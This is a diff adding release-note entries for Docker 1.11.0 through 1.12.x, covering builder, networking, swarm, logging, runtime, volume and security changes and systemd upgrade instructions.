+* Make daemon events listen for plugin lifecycle events [#24760](https://github.com/docker/docker/pull/24760)
+* Check for plugin state before enabling plugin [#25033](https://github.com/docker/docker/pull/25033)
+- Remove plugin root from filesystem on `plugin rm` [#25187](https://github.com/docker/docker/pull/25187)
+- Prevent deadlock when more than one plugin is installed [#25384](https://github.com/docker/docker/pull/25384)
+
+### Runtime
+
+* Mask join tokens in daemon logs [#25346](https://github.com/docker/docker/pull/25346)
+- Fix `docker ps --filter` causing the results to no longer be sorted by creation time [#25387](https://github.com/docker/docker/pull/25387)
+- Fix various crashes [#25053](https://github.com/docker/docker/pull/25053)
+
+### Security
+
+* Add `/proc/timer_list` to the masked paths list to prevent information leak from the host [#25630](https://github.com/docker/docker/pull/25630)
+* Allow systemd to run with only `--cap-add SYS_ADMIN` rather than having to also add `--cap-add DAC_READ_SEARCH` or disabling seccomp filtering [#25567](https://github.com/docker/docker/pull/25567)
+
+### Swarm
+
+- Fix an issue where the swarm can get stuck electing a new leader after quorum is lost [#25055](https://github.com/docker/docker/issues/25055)
+- Fix unwanted rescheduling of containers after a leader failover [#25017](https://github.com/docker/docker/issues/25017)
+- Change swarm root CA key to P256 curve [swarmkit#1376](https://github.com/docker/swarmkit/pull/1376)
+- Allow forced removal of a node from a swarm [#25159](https://github.com/docker/docker/pull/25159)
+- Fix connection leak when a node leaves a swarm [swarmkit/#1277](https://github.com/docker/swarmkit/pull/1277)
+- Backdate swarm certificates by one hour to tolerate more clock skew [swarmkit/#1243](https://github.com/docker/swarmkit/pull/1243)
+- Avoid high CPU use with many unschedulable tasks [swarmkit/#1287](https://github.com/docker/swarmkit/pull/1287)
+- Fix issue with global tasks not starting up [swarmkit/#1295](https://github.com/docker/swarmkit/pull/1295)
+- Garbage collect raft logs [swarmkit/#1327](https://github.com/docker/swarmkit/pull/1327)
+
+### Volume
+
+- Persist local volume options after a daemon restart [#25316](https://github.com/docker/docker/pull/25316)
+- Fix an issue where the mount ID was not returned on volume unmount [#25333](https://github.com/docker/docker/pull/25333)
+- Fix an issue where a volume mount could inadvertently create a bind mount [#25309](https://github.com/docker/docker/pull/25309)
+- `docker service create --mount type=bind,...` now correctly validates if the source path exists, instead of creating it [#25494](https://github.com/docker/docker/pull/25494)
+
+## 1.12.0 (2016-07-28)
+
+
+**IMPORTANT**: Docker 1.12.0 ships with an updated systemd unit file for rpm
+based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When
+upgrading from an older version of docker, the upgrade process may not
+automatically install the updated version of the unit file, or fail to start
+the docker service if;
+
+- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or
+- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive
+
+Starting the docker service will produce an error:
+
+    Failed to start docker.service: Unit docker.socket failed to load: No such file or directory.
+
+or
+
+    no sockets found via socket activation: make sure the service was started by systemd.
+
+To resolve this:
+
+- Backup the current version of the unit file, and replace the file with the
+  [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm)
+- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present
+- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present).
+
+After making those changes, run `sudo systemctl daemon-reload`, and `sudo
+systemctl restart docker` to reload changes and (re)start the docker daemon.
+
+**IMPORTANT**: With Docker 1.12, a Linux docker installation now has two
+additional binaries; `dockerd`, and `docker-proxy`. If you have scripts for
+installing docker, please make sure to update them accordingly.
+
+### Builder
+
++ New `HEALTHCHECK` Dockerfile instruction to support user-defined healthchecks [#23218](https://github.com/docker/docker/pull/23218)
++ New `SHELL` Dockerfile instruction to specify the default shell when using the shell form for commands in a Dockerfile [#22489](https://github.com/docker/docker/pull/22489)
++ Add `#escape=` Dockerfile directive to support platform-specific parsing of file paths in Dockerfile [#22268](https://github.com/docker/docker/pull/22268)
++ Add support for comments in `.dockerignore` [#23111](https://github.com/docker/docker/pull/23111)
+* Support for UTF-8 in Dockerfiles [#23372](https://github.com/docker/docker/pull/23372)
+* Skip UTF-8 BOM bytes from `Dockerfile` and `.dockerignore` if exist [#23234](https://github.com/docker/docker/pull/23234)
+* Windows: support for `ARG` to match Linux [#22508](https://github.com/docker/docker/pull/22508)
+- Fix error message when building using a daemon with the bridge network disabled [#22932](https://github.com/docker/docker/pull/22932)
+
+### Contrib
+
+* Enable seccomp for Centos 7 and Oracle Linux 7 [#22344](https://github.com/docker/docker/pull/22344)
+- Remove MountFlags in systemd unit to allow shared mount propagation [#22806](https://github.com/docker/docker/pull/22806)
+
+### Distribution
+
++ Add `--max-concurrent-downloads` and `--max-concurrent-uploads` daemon flags useful for situations where network connections don't support multiple downloads/uploads [#22445](https://github.com/docker/docker/pull/22445)
+* Registry operations now honor the `ALL_PROXY` environment variable [#22316](https://github.com/docker/docker/pull/22316)
+* Provide more information to the user on `docker load` [#23377](https://github.com/docker/docker/pull/23377)
+* Always save registry digest metadata about images pushed and pulled [#23996](https://github.com/docker/docker/pull/23996)
+
+### Logging
+
++ Syslog logging driver now supports DGRAM sockets [#21613](https://github.com/docker/docker/pull/21613)
++ Add `--details` option to `docker logs` to also display log tags [#21889](https://github.com/docker/docker/pull/21889)
++ Enable syslog logger to have access to env and labels [#21724](https://github.com/docker/docker/pull/21724)
++ An additional syslog-format option `rfc5424micro` to allow microsecond resolution in syslog timestamp [#21844](https://github.com/docker/docker/pull/21844)
+* Inherit the daemon log options when creating containers [#21153](https://github.com/docker/docker/pull/21153)
+* Remove `docker/` prefix from log messages tag and replace it with `{{.DaemonName}}` so that users have the option of changing the prefix [#22384](https://github.com/docker/docker/pull/22384)
+
+### Networking
+
++ Built-in Virtual-IP based  internal and ingress load-balancing using IPVS [#23361](https://github.com/docker/docker/pull/23361)
++ Routing Mesh using ingress overlay network [#23361](https://github.com/docker/docker/pull/23361)
++ Secured multi-host overlay networking using encrypted control-plane and Data-plane [#23361](https://github.com/docker/docker/pull/23361)
++ MacVlan driver is out of experimental [#23524](https://github.com/docker/docker/pull/23524)
++ Add `driver` filter to `network ls` [#22319](https://github.com/docker/docker/pull/22319)
++ Adding `network` filter to `docker ps --filter` [#23300](https://github.com/docker/docker/pull/23300)
++ Add `--link-local-ip` flag to `create`, `run` and `network connect` to specify a container's link-local address [#23415](https://github.com/docker/docker/pull/23415)
++ Add network label filter support [#21495](https://github.com/docker/docker/pull/21495)
+* Removed dependency on external KV-Store for Overlay networking in Swarm-Mode  [#23361](https://github.com/docker/docker/pull/23361)
+* Add container's short-id as default network alias [#21901](https://github.com/docker/docker/pull/21901)
+* `run` options `--dns` and `--net=host` are no longer mutually exclusive [#22408](https://github.com/docker/docker/pull/22408)
+- Fix DNS issue when renaming containers with generated names [#22716](https://github.com/docker/docker/pull/22716)
+- Allow both `network inspect -f {{.Id}}` and `network inspect -f {{.ID}}` to address inconsistency with inspect output [#23226](https://github.com/docker/docker/pull/23226)
+
+### Plugins (experimental)
+
++ New `plugin` command to manager plugins with `install`, `enable`, `disable`, `rm`, `inspect`, `set` subcommands [#23446](https://github.com/docker/docker/pull/23446)
+
+### Remote API (v1.24) & Client
+
++ Split the binary into two: `docker` (client) and `dockerd` (daemon) [#20639](https://github.com/docker/docker/pull/20639)
++ Add `before` and `since` filters to `docker images --filter` [#22908](https://github.com/docker/docker/pull/22908)
++ Add `--limit` option to `docker search` [#23107](https://github.com/docker/docker/pull/23107)
++ Add `--filter` option to `docker search` [#22369](https://github.com/docker/docker/pull/22369)
++ Add security options to `docker info` output [#21172](https://github.com/docker/docker/pull/21172) [#23520](https://github.com/docker/docker/pull/23520)
++ Add insecure registries to `docker info` output [#20410](https://github.com/docker/docker/pull/20410)
++ Extend Docker authorization with TLS user information [#21556](https://github.com/docker/docker/pull/21556)
++ devicemapper: expose Mininum Thin Pool Free Space through `docker info` [#21945](https://github.com/docker/docker/pull/21945)
+* API now returns a JSON object when an error occurs making it more consistent [#22880](https://github.com/docker/docker/pull/22880)
+- Prevent `docker run -i --restart` from hanging on exit [#22777](https://github.com/docker/docker/pull/22777)
+- Fix API/CLI discrepancy on hostname validation [#21641](https://github.com/docker/docker/pull/21641)
+- Fix discrepancy in the format of sizes in `stats` from HumanSize to BytesSize [#21773](https://github.com/docker/docker/pull/21773)
+- authz: when request is denied return forbbiden exit code (403) [#22448](https://github.com/docker/docker/pull/22448)
+- Windows: fix tty-related displaying issues [#23878](https://github.com/docker/docker/pull/23878)
+
+### Runtime
+
++ Split the userland proxy to a separate binary (`docker-proxy`) [#23312](https://github.com/docker/docker/pull/23312)
++ Add `--live-restore` daemon flag to keep containers running when daemon shuts down, and regain control on startup [#23213](https://github.com/docker/docker/pull/23213)
++ Ability to add OCI-compatible runtimes (via `--add-runtime` daemon flag) and select one with `--runtime` on `create` and `run` [#22983](https://github.com/docker/docker/pull/22983)
++ New `overlay2` graphdriver for Linux 4.0+ with multiple lower directory support [#22126](https://github.com/docker/docker/pull/22126)
++ New load/save image events [#22137](https://github.com/docker/docker/pull/22137)
++ Add support for reloading daemon configuration through systemd [#22446](https://github.com/docker/docker/pull/22446)
++ Add disk quota support for btrfs [#19651](https://github.com/docker/docker/pull/19651)
++ Add disk quota support for zfs [#21946](https://github.com/docker/docker/pull/21946)
++ Add support for `docker run --pid=container:<id>` [#22481](https://github.com/docker/docker/pull/22481)
++ Align default seccomp profile with selected capabilities [#22554](https://github.com/docker/docker/pull/22554)
++ Add a `daemon reload` event when the daemon reloads its configuration [#22590](https://github.com/docker/docker/pull/22590)
++ Add `trace` capability in the pprof profiler to show execution traces in binary form [#22715](https://github.com/docker/docker/pull/22715)
++ Add a `detach` event [#22898](https://github.com/docker/docker/pull/22898)
++ Add support for setting sysctls with `--sysctl` [#19265](https://github.com/docker/docker/pull/19265)
++ Add `--storage-opt` flag to `create` and `run` allowing to set `size` on devicemapper [#19367](https://github.com/docker/docker/pull/19367)
++ Add `--oom-score-adjust` daemon flag with a default value of `-500` making the daemon less likely to be killed before containers [#24516](https://github.com/docker/docker/pull/24516)
+* Undeprecate the `-c` short alias of `--cpu-shares` on `run`, `build`, `create`, `update` [#22621](https://github.com/docker/docker/pull/22621)
+* Prevent from using aufs and overlay graphdrivers on an eCryptfs mount [#23121](https://github.com/docker/docker/pull/23121)
+- Fix issues with tmpfs mount ordering [#22329](https://github.com/docker/docker/pull/22329)
+- Created containers are no longer listed on `docker ps -a -f exited=0` [#21947](https://github.com/docker/docker/pull/21947)
+- Fix an issue where containers are stuck in a "Removal In Progress" state [#22423](https://github.com/docker/docker/pull/22423)
+- Fix bug that was returning an HTTP 500 instead of a 400 when not specifying a command on run/create [#22762](https://github.com/docker/docker/pull/22762)
+- Fix bug with `--detach-keys` whereby input matching a prefix of the detach key was not preserved [#22943](https://github.com/docker/docker/pull/22943)
+- SELinux labeling is now disabled when using `--privileged` mode [#22993](https://github.com/docker/docker/pull/22993)
+- If volume-mounted into a container, `/etc/hosts`, `/etc/resolv.conf`, `/etc/hostname` are no longer SELinux-relabeled [#22993](https://github.com/docker/docker/pull/22993)
+- Fix inconsistency in `--tmpfs` behavior regarding mount options [#22438](https://github.com/docker/docker/pull/22438)
+- Fix an issue where daemon hangs at startup [#23148](https://github.com/docker/docker/pull/23148)
+- Ignore SIGPIPE events to prevent journald restarts to crash docker in some cases [#22460](https://github.com/docker/docker/pull/22460)
+- Containers are not removed from stats list on error [#20835](https://github.com/docker/docker/pull/20835)
+- Fix `on-failure` restart policy when daemon restarts [#20853](https://github.com/docker/docker/pull/20853)
+- Fix an issue with `stats` when a container is using another container's network [#21904](https://github.com/docker/docker/pull/21904)
+
+### Swarm Mode
+
++ New `swarm` command to manage swarms with `init`, `join`, `join-token`, `leave`, `update` subcommands [#23361](https://github.com/docker/docker/pull/23361) [#24823](https://github.com/docker/docker/pull/24823)
++ New `service` command to manage swarm-wide services with `create`, `inspect`, `update`, `rm`, `ps` subcommands [#23361](https://github.com/docker/docker/pull/23361) [#25140](https://github.com/docker/docker/pull/25140)
++ New `node` command to manage nodes with `accept`, `promote`, `demote`, `inspect`, `update`, `ps`, `ls` and `rm` subcommands [#23361](https://github.com/docker/docker/pull/23361) [#25140](https://github.com/docker/docker/pull/25140)
++ (experimental) New `stack` and `deploy` commands to manage and deploy multi-service applications [#23522](https://github.com/docker/docker/pull/23522) [#25140](https://github.com/docker/docker/pull/25140)
+
+### Volume
+
++ Add support for local and global volume scopes (analogous to network scopes) [#22077](https://github.com/docker/docker/pull/22077)
++ Allow volume drivers to provide a `Status` field [#21006](https://github.com/docker/docker/pull/21006)
++ Add name/driver filter support for volume [#21361](https://github.com/docker/docker/pull/21361)
+* Mount/Unmount operations now receives an opaque ID to allow volume drivers to differentiate between two callers [#21015](https://github.com/docker/docker/pull/21015)
+- Fix issue preventing to remove a volume in a corner case [#22103](https://github.com/docker/docker/pull/22103)
+- Windows: Enable auto-creation of host-path to match Linux [#22094](https://github.com/docker/docker/pull/22094)
+
+
+### DEPRECATION
+* Environment variables `DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE` and `DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE` have been renamed
+  to `DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE` and `DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE` respectively [#22574](https://github.com/docker/docker/pull/22574)
+* Remove deprecated `syslog-tag`, `gelf-tag`, `fluentd-tag` log option in favor of the more generic `tag` one [#22620](https://github.com/docker/docker/pull/22620)
+* Remove deprecated feature of passing HostConfig at API container start [#22570](https://github.com/docker/docker/pull/22570)
+* Remove deprecated `-f`/`--force` flag on docker tag [#23090](https://github.com/docker/docker/pull/23090)
+* Remove deprecated `/containers/<id|name>/copy` endpoint [#22149](https://github.com/docker/docker/pull/22149)
+* Remove deprecated `docker ps` flags `--since` and `--before` [#22138](https://github.com/docker/docker/pull/22138)
+* Deprecate the old 3-args form of `docker import` [#23273](https://github.com/docker/docker/pull/23273)
+
+## 1.11.2 (2016-05-31)
+
+### Networking
+
+- Fix a stale endpoint issue on overlay networks during ungraceful restart ([#23015](https://github.com/docker/docker/pull/23015))
+- Fix an issue where the wrong port could be reported by `docker inspect/ps/port` ([#22997](https://github.com/docker/docker/pull/22997))
+
+### Runtime
+
+- Fix a potential panic when running `docker build` ([#23032](https://github.com/docker/docker/pull/23032))
+- Fix interpretation of `--user` parameter ([#22998](https://github.com/docker/docker/pull/22998))
+- Fix a bug preventing container statistics to be correctly reported ([#22955](https://github.com/docker/docker/pull/22955))
+- Fix an issue preventing container to be restarted after daemon restart ([#22947](https://github.com/docker/docker/pull/22947))
+- Fix issues when running 32 bit binaries on Ubuntu 16.04 ([#22922](https://github.com/docker/docker/pull/22922))
+- Fix a possible deadlock on image deletion and container attach ([#22918](https://github.com/docker/docker/pull/22918))
+- Fix an issue where containers fail to start after a daemon restart if they depend on a containerized cluster store ([#22561](https://github.com/docker/docker/pull/22561))
+- Fix an issue causing `docker ps` to hang on CentOS when using devicemapper ([#22168](https://github.com/docker/docker/pull/22168), [#23067](https://github.com/docker/docker/pull/23067))
+- Fix a bug preventing to `docker exec` into a container when using devicemapper ([#22168](https://github.com/docker/docker/pull/22168), [#23067](https://github.com/docker/docker/pull/23067))
+
+
+## 1.11.1 (2016-04-26)
+
+### Distribution
+
+- Fix schema2 manifest media type to be of type `application/vnd.docker.container.image.v1+json` ([#21949](https://github.com/docker/docker/pull/21949))
+
+### Documentation
+
++ Add missing API documentation for changes introduced with 1.11.0 ([#22048](https://github.com/docker/docker/pull/22048))
+
+### Builder
+
+* Append label passed to `docker build` as arguments as an implicit `LABEL` command at the end of the processed `Dockerfile` ([#22184](https://github.com/docker/docker/pull/22184))
+
+### Networking
+
+- Fix a panic that would occur when forwarding DNS query ([#22261](https://github.com/docker/docker/pull/22261))
+- Fix an issue where OS threads could end up within an incorrect network namespace when using user defined networks ([#22261](https://github.com/docker/docker/pull/22261))
+
+### Runtime
+
+- Fix a bug preventing labels configuration to be reloaded via the config file ([#22299](https://github.com/docker/docker/pull/22299))
+- Fix a regression where container mounting `/var/run` would prevent other containers from being removed ([#22256](https://github.com/docker/docker/pull/22256))
+- Fix an issue where it would be impossible to update both `memory-swap` and `memory` value together ([#22255](https://github.com/docker/docker/pull/22255))
+- Fix a regression from 1.11.0 where the `/auth` endpoint would not initialize `serveraddress` if it is not provided ([#22254](https://github.com/docker/docker/pull/22254))
+- Add missing cleanup of container temporary files when cancelling a schedule restart ([#22237](https://github.com/docker/docker/pull/22237))
+- Remove scary error message when no restart policy is specified ([#21993](https://github.com/docker/docker/pull/21993))
+- Fix a panic that would occur when the plugins were activated via the json spec ([#22191](https://github.com/docker/docker/pull/22191))
+- Fix restart backoff logic to correctly reset delay if container ran for at least 10secs ([#22125](https://github.com/docker/docker/pull/22125))
+- Remove error message when a container restart get cancelled ([#22123](https://github.com/docker/docker/pull/22123))
+- Fix an issue where `docker` would not correctly clean up after `docker exec` ([#22121](https://github.com/docker/docker/pull/22121))
+- Fix a panic that could occur when serving concurrent `docker stats` commands ([#22120](https://github.com/docker/docker/pull/22120))`
+- Revert deprecation of non-existent host directories auto-creation ([#22065](https://github.com/docker/docker/pull/22065))
+- Hide misleading rpc error on daemon shutdown ([#22058](https://github.com/docker/docker/pull/22058))
+
+## 1.11.0 (2016-04-13)
+
+**IMPORTANT**: With Docker 1.11, a Linux docker installation is now made of 4 binaries (`docker`, [`docker-containerd`](https://github.com/docker/containerd), [`docker-containerd-shim`](https://github.com/docker/containerd) and [`docker-runc`](https://github.com/opencontainers/runc)). If you have scripts relying on docker being a single static binaries, please make sure to update them. Interaction with the daemon stay the same otherwise, the usage of the other binaries should be transparent. A Windows docker installation remains a single binary, `docker.exe`.
+
+### Builder
+
+- Fix a bug where Docker would not use the correct uid/gid when processing the `WORKDIR` command ([#21033](https://github.com/docker/docker/pull/21033))
+- Fix a bug where copy operations with userns would not use the proper uid/gid ([#20782](https://github.com/docker/docker/pull/20782), [#21162](https://github.com/docker/docker/pull/21162))
+
+### Client
+
+* Usage of the `:` separator for security option has been deprecated. `=` should be used instead ([#21232](https://github.com/docker/docker/pull/21232))
++ The client user agent is now passed to the registry on `pull`, `build`, `push`, `login` and `search` operations ([#21306](https://github.com/docker/docker/pull/21306), [#21373](https://github.com/docker/docker/pull/21373))
+* Allow setting the Domainname and Hostname separately through the API ([#20200](https://github.com/docker/docker/pull/20200))
+* Docker info will now warn users if it can not detect the kernel version or the operating system ([#21128](https://github.com/docker/docker/pull/21128))
+- Fix an issue where `docker stats --no-stream` output could be all 0s ([#20803](https://github.com/docker/docker/pull/20803))
+- Fix a bug where some newly started container would not appear in a running `docker stats` command ([#20792](https://github.com/docker/docker/pull/20792))
+* Post processing is no longer enabled for linux-cgo terminals ([#20587](https://github.com/docker/docker/pull/20587))
+- Values to `--hostname` are now refused if they do not comply with [RFC1123](https://tools.ietf.org/html/rfc1123) ([#20566](https://github.com/docker/docker/pull/20566))
++ Docker learned how to use a SOCKS proxy ([#20366](https://github.com/docker/docker/pull/20366), [#18373](https://github.com/docker/docker/pull/18373))
++ Docker now supports external credential stores ([#20107](https://github.com/docker/docker/pull/20107))
+* `docker ps` now supports displaying the list of volumes mounted inside a container ([#20017](https://github.com/docker/docker/pull/20017))
+* `docker info` now also reports Docker's root directory location ([#19986](https://github.com/docker/docker/pull/19986))
+- Docker now prohibits login in with an empty username (spaces are trimmed) ([#19806](https://github.com/docker/docker/pull/19806))
+* Docker events attributes are now sorted by key ([#19761](https://github.com/docker/docker/pull/19761))
+* `docker ps` no longer shows exported port for stopped containers ([#19483](https://github.com/docker/docker/pull/19483))
+- Docker now cleans after itself if a save/export command fails ([#17849](https://github.com/docker/docker/pull/17849))
+* Docker load learned how to display a progress bar ([#17329](https://github.com/docker/docker/pull/17329), [#120078](https://github.com/docker/docker/pull/20078))
+
+### Distribution
+
+- Fix a panic that occurred when pulling an image with 0 layers ([#21222](https://github.com/docker/docker/pull/21222))
+- Fix a panic that could occur on error while pushing to a registry with a misconfigured token service ([#21212](https://github.com/docker/docker/pull/21212))
++ All first-level delegation roles are now signed when doing a trusted push ([#21046](https://github.com/docker/docker/pull/21046))
++ OAuth support for registries was added ([#20970](https://github.com/docker/docker/pull/20970))
+* `docker login` now handles token using the implementation found in [docker/distribution](https://github.com/docker/distribution) ([#20832](https://github.com/docker/docker/pull/20832))
+* `docker login` will no longer prompt for an email ([#20565](https://github.com/docker/docker/pull/20565))
+* Docker will now fallback to registry V1 if no basic auth credentials are available ([#20241](https://github.com/docker/docker/pull/20241))
+* Docker will now try to resume layer download where it left off after a network error/timeout ([#19840](https://github.com/docker/docker/pull/19840))
+- Fix generated manifest mediaType when pushing cross-repository ([#19509](https://github.com/docker/docker/pull/19509))
+- Fix docker requesting additional push credentials when pulling an image if Content Trust is enabled ([#20382](https://github.com/docker/docker/pull/20382))
+
+### Logging
+
+- Fix a race in the journald log driver ([#21311](https://github.com/docker/docker/pull/21311))
+* Docker syslog driver now uses the RFC-5424 format when emitting logs ([#20121](https://github.com/docker/docker/pull/20121))
+* Docker GELF log driver now allows to specify the compression algorithm and level via the `gelf-compression-type` and `gelf-compression-level` options ([#19831](https://github.com/docker/docker/pull/19831))
+* Docker daemon learned to output uncolorized logs via the `--raw-logs` options ([#19794](https://github.com/docker/docker/pull/19794))
++ Docker, on Windows platform, now includes an ETW (Event Tracing in Windows) logging driver named `etwlogs` ([#19689](https://github.com/docker/docker/pull/19689))
+* Journald log driver learned how to handle tags ([#19564](https://github.com/docker/docker/pull/19564))
++ The fluentd log driver learned the following options: `fluentd-address`, `fluentd-buffer-limit`, `fluentd-retry-wait`, `fluentd-max-retries` and `fluentd-async-connect` ([#19439](https://github.com/docker/docker/pull/19439))
++ Docker learned to send log to Google Cloud via the new `gcplogs` logging driver. ([#18766](https://github.com/docker/docker/pull/18766))
+
+
+### Misc
+
++ When saving linked images together with `docker save` a subsequent `docker load` will correctly restore their parent/child relationship ([#21385](https://github.com/docker/docker/pull/21385))
++ Support for building the Docker cli for OpenBSD was added ([#21325](https://github.com/docker/docker/pull/21325))
++ Labels can now be applied at network, volume and image creation ([#21270](https://github.com/docker/docker/pull/21270))
+* The `dockremap` is now created as a system user ([#21266](https://github.com/docker/docker/pull/21266))
+- Fix a few response body leaks ([#21258](https://github.com/docker/docker/pull/21258))
+- Docker, when run as a service with systemd, will now properly manage its processes cgroups ([#20633](https://github.com/docker/docker/pull/20633))
+* `docker info` now reports the value of cgroup KernelMemory or emits a warning if it is not supported ([#20863](https://github.com/docker/docker/pull/20863))
+* `docker info` now also reports the cgroup driver in use ([#20388](https://github.com/docker/docker/pull/20388))
+* Docker completion is now available on PowerShell ([#19894](https://github.com/docker/docker/pull/19894))
+* `dockerinit` is no more ([#19490](https://github.com/docker/docker/pull/19490),[#19851](https://github.com/docker/docker/pull/19851))
++ Support for building Docker on arm64 was added ([#19013](https://github.com/docker/docker/pull/19013))
++ Experimental support for building docker.exe in a native Windows Docker installation ([#18348](https://github.com/docker/docker/pull/18348))
+
+### Networking
+
+- Fix panic if a node is forcibly removed from the cluster ([#21671](https://github.com/docker/docker/pull/21671))
+- Fix "error creating vxlan interface" when starting a container in a Swarm cluster ([#21671](https://github.com/docker/docker/pull/21671))
+* `docker network inspect` will now report all endpoints whether they have an active container or not ([#21160](https://github.com/docker/docker/pull/21160))
++ Experimental support for the MacVlan and IPVlan network drivers has been added ([#21122](https://github.com/docker/docker/pull/21122))
+* Output of `docker network ls` is now sorted by network name ([#20383](https://github.com/docker/docker/pull/20383))
+- Fix a bug where Docker would allow a network to be created with the reserved `default` name ([#19431](https://github.com/docker/docker/pull/19431))
+* `docker network inspect` returns whether a network is internal or not ([#19357](https://github.com/docker/docker/pull/19357))
++ Control IPv6 via explicit option when creating a network (`docker network create --ipv6`). This shows up as a new `EnableIPv6` field in `docker network inspect` ([#17513](https://github.com/docker/docker/pull/17513))
+* Support for AAAA Records (aka IPv6 Service Discovery) in embedded DNS Server ([#21396](https://github.com/docker/docker/pull/21396))
+- Fix to not forward docker domain IPv6 queries to external servers ([#21396](https://github.com/docker/docker/pull/21396))
+* Multiple A/AAAA records from embedded DNS Server for DNS Round robin ([#21019](https://github.com/docker/docker/pull/21019))
+- Fix endpoint count inconsistency after an ungraceful dameon restart ([#21261](https://github.com/docker/docker/pull/21261))
+- Move the ownership of exposed ports and port-mapping options from Endpoint to Sandbox ([#21019](https://github.com/docker/docker/pull/21019))
+- Fixed a bug which prevents docker reload when host is configured with ipv6.disable=1 ([#21019](https://github.com/docker/docker/pull/21019))
+- Added inbuilt nil IPAM driver ([#21019](https://github.com/docker/docker/pull/21019))
+- Fixed bug in iptables.Exists() logic [#21019](https://github.com/docker/docker/pull/21019)
+- Fixed a Veth interface leak when using overlay network ([#21019](https://github.com/docker/docker/pull/21019))
+- Fixed a bug which prevents docker reload after a network delete during shutdown ([#20214](https://github.com/docker/docker/pull/20214))
+- Make sure iptables chains are recreated on firewalld reload ([#20419](https://github.com/docker/docker/pull/20419))
+- Allow to pass global datastore during config reload ([#20419](https://github.com/docker/docker/pull/20419))
+- For anonymous containers use the alias name for IP to name mapping, ie:DNS PTR record ([#21019](https://github.com/docker/docker/pull/21019))
+- Fix a panic when deleting an entry from /etc/hosts file  ([#21019](https://github.com/docker/docker/pull/21019))
+- Source the forwarded DNS queries from the container net namespace  ([#21019](https://github.com/docker/docker/pull/21019))
+- Fix to retain the network internal mode config for bridge networks on daemon reload ([#21780] (https://github.com/docker/docker/pull/21780))
+- Fix to retain IPAM driver option configs on daemon reload ([#21914] (https://github.com/docker/docker/pull/21914))
+
+### Plugins
+
+- Fix a file descriptor leak that would occur every time plugins were enumerated ([#20686](https://github.com/docker/docker/pull/20686))
+- Fix an issue where Authz plugin would corrupt the payload body when faced with a large amount of data ([#20602](https://github.com/docker/docker/pull/20602))
+
+### Runtime
+
+- Fix a panic that could occur when cleanup after a container started with invalid parameters ([#21716](https://github.com/docker/docker/pull/21716))
+- Fix a race with event timers stopping early ([#21692](https://github.com/docker/docker/pull/21692))
+- Fix race conditions in the layer store, potentially corrupting the map and crashing the process ([#21677](https://github.com/docker/docker/pull/21677))
+- Un-deprecate auto-creation of host directories for mounts. This feature was marked deprecated in ([#21666](https://github.com/docker/docker/pull/21666))
+  Docker 1.9, but was decided to be too much of a backward-incompatible change, so it was decided to keep the feature.
++ It is now possible for containers to share the NET and IPC namespaces when `userns` is enabled ([#21383](https://github.com/docker/docker/pull/21383))
++ `docker inspect <image-id>` will now expose the rootfs layers ([#21370](https://github.com/docker/docker/pull/21370))
++ Docker Windows gained a minimal `top` implementation ([#21354](https://github.com/docker/docker/pull/21354))
+* Docker learned to report the faulty exe when a container cannot be started due to its condition ([#21345](https://github.com/docker/docker/pull/21345))
+* Docker with device mapper will now refuse to run if `udev sync` is not available ([#21097](https://github.com/docker/docker/pull/21097))
+- Fix a bug where Docker would not validate the config file upon configuration reload ([#21089](https://github.com/docker/docker/pull/21089))
+- Fix a hang that would happen on attach if initial start was to fail ([#21048](https://github.com/docker/docker/pull/21048))
+- Fix an issue where registry service options in the daemon configuration file were not properly taken into account ([#21045](https://github.com/docker/docker/pull/21045))
+- Fix a race between the exec and resize operations ([#21022](https://github.com/docker/docker/pull/21022))
+- Fix an issue where nanoseconds were not correctly taken in account when filtering Docker events ([#21013](https://github.com/docker/docker/pull/21013))
+- Fix the handling of Docker command when passed a 64 bytes id ([#21002](https://github.com/docker/docker/pull/21002))
+* Docker will now return a `204` (i.e http.StatusNoContent) code when it successfully deleted a network ([#20977](https://github.com/docker/docker/pull/20977))
+- Fix a bug where the daemon would wait indefinitely in case the process it was about to killed had already exited on its own ([#20967](https://github.com/docker/docker/pull/20967)
+* The devmapper driver learned the `dm.min_free_space` option. If the mapped device free space reaches the passed value, new device creation will be prohibited. ([#20786](https://github.com/docker/docker/pull/20786))
++ Docker can now prevent processes in container to gain new privileges via the `--security-opt=no-new-privileges` flag ([#20727](https://github.com/docker/docker/pull/20727))
+- Starting a container with the `--device` option will now correctly resolves symlinks ([#20684](https://github.com/docker/docker/pull/20684))
++ Docker now relies on [`containerd`](https://github.com/docker/containerd) and [`runc`](https://github.com/opencontainers/runc) to spawn containers. ([#20662](https://github.com/docker/docker/pull/20662))
+- Fix docker configuration reloading to only alter value present in the given config file ([#20604](https://github.com/docker/docker/pull/20604))
++ Docker now allows setting a container hostname via the `--hostname` flag when `--net=host` ([#20177](https://github.com/docker/docker/pull/20177))
++ Docker now allows executing privileged container while running with `--userns-remap` if both `--privileged` and the new `--userns=host` flag are specified ([#20111](https://github.com/docker/docker/pull/20111))
+- Fix Docker not cleaning up correctly old containers upon restarting after a crash ([#19679](https://github.com/docker/docker/pull/19679))
+* Docker will now error out if it doesn't recognize a configuration key within the config file ([#19517](https://github.com/docker/docker/pull/19517))
+- Fix container loading, on daemon startup, when they depends on a plugin running within a container ([#19500](https://github.com/docker/docker/pull/19500))
+* `docker update` learned how to change a container restart policy ([#19116](https://github.com/docker/docker/pull/19116))
+* `docker inspect` now also returns a new `State` field containing the container state in a human readable way (i.e. one of `created`, `restarting`, `running`, `paused`, `exited` or `dead`)([#18966](https://github.com/docker/docker/pull/18966))
++ Docker learned to limit the number of active pids (i.e. processes) within the container via the `pids-limit` flags. NOTE: This requires `CGROUP_PIDS=y` to be in the kernel configuration. ([#18697](https://github.com/docker/docker/pull/18697))
+- `docker load` now has a `--quiet` option to suppress the load output ([#20078](https://github.com/docker/docker/pull/20078))
+- Fix a bug in neighbor discovery for IPv6 peers ([#20842](https://github.com/docker/docker/pull/20842))
+- Fix a panic during cleanup if a container was started with invalid options ([#21802](https://github.com/docker/docker/pull/21802))
